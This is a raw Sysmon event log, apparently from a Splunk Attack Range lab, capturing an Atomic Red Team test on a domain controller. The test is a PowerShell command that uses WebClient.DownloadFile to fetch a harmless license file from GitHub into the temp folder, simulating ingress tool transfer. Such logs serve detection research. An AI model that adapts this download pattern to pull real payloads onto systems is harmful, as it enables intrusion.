AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local1489-true0:0:0:0:0:0:0:1win-dc-792.attackrange.local47001- 354300x80000000000000005917272Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.847{00000000-0000-0000-0000-000000000000}6268<unknown process>-tcptruefalse10.0.1.14win-dc-792.attackrange.local1488-false185.199.111.133cdn-185-199-111-133.github.com443https 10341000x80000000000000005917271Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:25.722{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917270Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:25.722{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917269Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:25.477{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0583690B5DE70011C29F6D18D00CE7D,SHA256=90A961096E6351A2B83413DA28949EEF1A041FAAC2E5E88BD5CF877B6EED603C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917268Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:25.444{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=4296EB5FEA29D2B550E006AC561EE22A,SHA256=C89006AE6E595F53CCCC87F8A8508DADB9E3FBE1C07605EB38E8FF0573DBDD8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917267Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:25.126{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0E7319D247C735D462D4D7555DEA6B2D,SHA256=63C98035F86FF52D9A9F7B4AF18FDE17410A2BBD618DA324ADE1A22DD574A3FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638431Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:26.929{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A17B418DCFDB7EF0F93EA63F27AE250,SHA256=E95DFA147F68DF8DBE72F72527566E23EE509521212FA1184515E206EFA5E8A0,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000005917309Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.999{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-24 21:49:22.186 11241100x80000000000000005917308Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.997{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-24 21:49:22.185 23542300x80000000000000005917307Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.965{896A638B-FBAD-6058-BE11-00000000AE01}4492ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-err.txtMD5=3218869D5DBBBCB7483314E9E51B57F6,SHA256=30842435FE317174C25CE9BEA73707D3A5F4495221FD0C84E0F22B6473B4AD6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917306Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.908{896A638B-B3E6-605B-7069-00000000AE01}2252ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000005917305Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.761{896A638B-B3E6-605B-7069-00000000AE01}2252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Atomic-license.txt2021-03-23 13:43:55.516 23542300x80000000000000005917304Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.760{896A638B-B3E6-605B-7069-00000000AE01}2252ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Atomic-license.txtMD5=DDA4F30CDD84D94A82586B61071F6AE3,SHA256=65AF6027045D23175366EAB50E460AB3EE7790E591CB84CC32C78AC63A4C90E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005917303Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:23.268{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1491-false185.199.111.133cdn-185-199-111-133.github.com443https 354300x80000000000000005917302Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:23.222{896A638B-B5C0-6058-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local1490-true0:0:0:0:0:0:0:1win-dc-792.attackrange.local47001- 354300x80000000000000005917301Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:23.222{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local1490-true0:0:0:0:0:0:0:1win-dc-792.attackrange.local47001- 10341000x80000000000000005917300Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.722{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917299Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.722{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917298Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.688{896A638B-B5CB-6058-1600-00000000AE01}13085440C:\Windows\System32\svchost.exe{896A638B-B3E6-605B-7069-00000000AE01}2252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917297Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.688{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B3E6-605B-7069-00000000AE01}2252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917296Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.648{896A638B-B5C8-6058-0B00-00000000AE01}6128092C:\Windows\system32\lsass.exe{896A638B-B3E6-605B-7069-00000000AE01}2252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917295Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.648{896A638B-B5C8-6058-0B00-00000000AE01}6128092C:\Windows\system32\lsass.exe{896A638B-B3E6-605B-7069-00000000AE01}2252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000005917294Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:49:26.630{896A638B-B3E6-605B-7069-00000000AE01}2252\PSHost.132610961664757866.2252.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000005917293Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.614{896A638B-B3E6-605B-7069-00000000AE01}2252ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_pybub3wu.z32.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917292Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.613{896A638B-B3E6-605B-7069-00000000AE01}2252ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_grtdcsoi.gnn.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000005917291Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.598{896A638B-B3E6-605B-7069-00000000AE01}2252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_grtdcsoi.gnn.ps12021-03-24 21:49:26.598 10341000x80000000000000005917290Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.525{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B3E6-605B-7069-00000000AE01}2252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917289Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.510{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3F839A923F51F3F48903666398B22ED,SHA256=EF79209FD37F7BD5B5C1585FCD33ACC59A9B571ECDD5D35E00F50B15384DB834,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917288Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.490{896A638B-FBAD-6058-BF11-00000000AE01}10032C:\Windows\system32\conhost.exe{896A638B-B3E6-605B-7069-00000000AE01}2252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917287Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.488{896A638B-FBAD-6058-BE11-00000000AE01}4492212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{896A638B-B3E6-605B-7069-00000000AE01}2252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c01f5|UNKNOWN(00007FFA6D95C033) 10341000x80000000000000005917286Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.486{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917285Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.486{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917284Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.486{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917283Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.486{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917282Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.486{896A638B-B8DD-6058-9202-00000000AE01}36324636C:\Windows\system32\csrss.exe{896A638B-B3E6-605B-7069-00000000AE01}2252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917281Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.485{896A638B-FBAD-6058-BE11-00000000AE01}4492212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{896A638B-B3E6-605B-7069-00000000AE01}2252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b2a0a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b2871(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af43b9a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3aaaf7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+afe7b349(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af37009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3d3b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b59b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3a66d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3e2d74(wow64) 154100x80000000000000005917280Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.475{896A638B-B3E6-605B-7069-00000000AE01}2252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {(New-Object System.Net.WebClient).DownloadFile(\""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt\"", \""$env:TEMP\Atomic-license.txt\"")} 